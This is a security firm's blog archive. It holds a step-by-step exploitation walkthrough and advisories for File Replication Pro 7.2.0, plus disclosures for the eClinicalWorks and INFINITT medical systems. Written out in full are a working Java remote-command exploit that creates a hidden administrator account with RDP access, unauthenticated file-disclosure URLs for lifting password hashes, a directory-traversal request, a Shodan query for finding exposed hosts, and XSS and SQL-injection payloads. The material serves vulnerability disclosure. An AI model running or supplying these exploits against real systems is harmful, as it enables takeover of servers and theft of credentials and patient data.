Monthly Archives: February 2016

Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro 7.2.0 was released on this site. This post shows the steps involved to remotely gain access to the system that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step will be to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer , there will be a few services added to startup, namely 3 ‘prunsrv.exe’ processes as shown below. Note that the services are running under the privileges of the NT AUTHORITY\SYSTEM account:

frp1

The unauthenticated remote command execution vulnerability will be exploiting the way these processes handle password authentication to achieve command execution as the NT AUTHORITY\SYSTEM user. Using a browser, navigate to the localhost’s port 9200, which runs the replication RPC service. You should see the following:

frp2

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that the current RPC server does not require any form of authentication. This is the default behavior in a vanilla install. However, if you see an “ERROR” instead of an “OK”, it means that the RPC server is configured with a password and authentication is required. There is however another vulnerability that exists in the software that allows unauthenticated remote file access which can be abused to retrieve the password hash. FRP password hashes and configurations can be access remotely and unauthenticated using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

You should see the password hash in the configuration.xml file. If more clients have been added to the FRP management server, you will also be able to see all the other password hashes there. If you explore further and take a look into the .jar and .war files that can be found in the installation directory and figure how the software works, you can then proceed to create a malicious RPC client, that in this example, adds an arbitrary user to the remote system, and then adds this user to both the Administrator and RDP groups.

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to :9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

frp3

After the exploit code was successfully executed:

Screen Shot 2016-02-15 at 11.40.51 PM

frp4

frp5

If RDP was not activated on the remote host, you can always tweak the commands in the exploit to activate it. You should now be able to RDP to the box and access the box as an Administrator.

Here is a video showing the exploit in action:

Update: After a long time, the guys at FRP finally released the fixed version: https://frpsupport.fogbugz.com/default.asp?W291

frp2016-730-released

Advertisements

VP2016-001: Remote Command Execution in File Replication Pro

Vantage Point Security Advisory 2016-001
========================================

Title: Multiple Vulnerabilities in File Replication Pro v7.2.0 
Vendor: File Replication Pro
Vendor URL: http://www.filereplicationpro.com
Versions affected: =< 7.2.0
Severity: High
Vendor notified: Yes
Reported: 29 October 2015
Public release: 10 February 2016
Author: Jerold Hoong and the VP security team 

Summary:
--------
Vantage Point has discovered multiple previously unknown vulnerabilities in File Replication Pro v7.2.0 (and possibly all prior versions) that allow a remote unauthenticated malicious user to run arbitrary code with SYSTEM privileges. The File Replication Pro software is a file management solution that is used to back up and copy files from various nodes in the network. 

The vulnerabilities that were discovered are:

- Unauthenticated Remote Command Execution
- Unauthenticated Remote Arbitrary File Disclosure
- Unauthenticated Directory Traversal and File Listing

1. Unauthenticated Remote Command Execution
-------------------------------------------
The backup agents implements a RPC service port 9200 that supports various calls, including a function called "ExecCommand" that unsurprisingly executes shell commands on the system. A password hash is used to authenticate calls on this interface (note that the hash and not the password is used for authentication). This hash can be obtained from the remote file disclosure vulnerability present in the software (listed below) and used to directly authenticate to the RPC service, where subsequently, arbitrary commands are executed as the SYSTEM user.

POC Exploit Code of Malicious RPC Client:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to :9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}


2. Unauthenticated Remote Arbitrary File Disclosure
---------------------------------------------------
A flaw in File Replication Pro allows a malicious user to gain access to the contents of any file on the remote server. This could lead to the compromise of sensitive information such as user accounts and password hashes, which could then be used to further exploit the server using other vulnerabilities in the software. An example of how to view File Replication Pro's web interface user accounts and credentials is shown below by accessing the following URLs:

- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml
- http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml


3. Unauthenticated Directory Traversal and File Listing
-------------------------------------------------------
It was possible to anonymously view the file directory structure of the remote File Replication Pro management server as well as the file directory structure of all server nodes that are managed by the management server. The parameters that are used to construct the POST request in the example code below can be obtained via the remote file disclosure vulnerability by accessing File Replication Pro's configuration.xml, properties.xml and .frp_id files.

POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/ HTTP/1.1
Host: 127.0.0.1:9100
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:9100/AddEditJob.do?action=new
Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0


Fix Information:
----------------
Upgrade to the latest version of File Replication Pro 7.3.0

Timeline:
---------
28 October 2015  - Vulnerabilities discovered
06 November 2015 - Vendor acknowledged and scheduled fixes to commence
02 February 2016 - Patch released by vendor
10 February 2016 - Release of this advisory to the public 

About Vantage Point Security:
-----------------------------

Vantage Point is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture.

https://www.vantagepoint.sg/
office[at]vantagepoint[dot]sg

eClinicalWorks (CCMR) – Multiple Vulnerabilities

# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities
# Vendor: https://www.eclinicalworks.com
# Product: eClinicalWorks Population Health (CCMR) Client Portal Software 
# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/
# Credit: Jerold Hoong
-------------------------------------
# CVE-2015-4591 CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary javascript via the strMessage parameter.

https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E
-------------------------------------
# CVE-2015-4592 SQL INJECTION
SQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population Health (CCMR) Client Portal Software allows remote authenticated users to inject arbitrary malicious database commands as part of user input.

Parameter: uemail (POST PARAMETER)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=
&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=

POST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1
Host: 127.0.0.1:443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp
Content-Length: 186
[SNIP] ...
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
[SNIP] ...

action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=
-------------------------------------
# CVE-2015-4593 CROSS-SITE REQUEST FORGERY
Cross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks  Client Portal allows remote attackers to hijack the authentication of content administrators for requests that could lead to the creation, modification and deletion of users, appointments and employees.
-------------------------------------
# CVE-2015-4594 SESSION FIXATION
The web application is vulnerable to session fixation attacks. When authenticating a user the application does not assign a new session ID, making it possible to use an existent session ID.
-------------------------------------
# TIMELINE
– 16/06/2015: Vulnerability found
– 16/06/2015: Vendor informed
– 16/06/2015: Request for CVE IDs
- 16/06/2015: MITRE issued CVE numbers
– 16/06/2015: Vendor responded requesting more information on support contract etc
- 21/06/2015: No support contract, vendor does not open case
- 22/06/2015: Requested update from vendor, no response
- 01/07/2015: Contacted vendor again, vendor requested for support contract again
- 02/07/2015: No support contract, no response from vendor
– 31/01/2016: Public disclosure

INFINITT PACs – Multiple Vulnerablities

# Title: INFINITT PACs Health Care System - Multiple Vulnerabilities
# Vendor: http://www.infinitt.com/cms/index
# Product: INFINITT PACs Health Care System 
# Credit: Jerold Hoong
-------------------------------------
# CROSS-SITE SCRIPTING
Cross-site scripting (XSS) vulnerability in jerry.asp in INFINITT PACs Health Care System allows remote unauthenticated users to inject arbitrary javascript via the pname parameter.
-------------------------------------
# SQL INJECTION
SQL injection vulnerability in jerry.asp in INFINITT PACs Health Care System allows remote authenticated users to inject arbitrary malicious database commands as part of user input via the uid parameter.
-------------------------------------
# PASSWORDS ENCODED IN PACS DATABASE
The Infinitt PACS system does not implement an encryption scheme when storing user account passwords in the database. Based on our observations, the application does a “substitution” operation for each of the password characters and stores the password directly into the database.
-------------------------------------
# INSECURE PROTOCOL USED
The Infinitt PACS system communicates with the DICOM component using the HTTP protocol. The system uses HTTP basic authentication when retrieving DICOM images from the server, which includes user  credentials encoded in Base64 as part of the HTTP request. This can be easily decoded to obtain the authentication credentials in plaintext.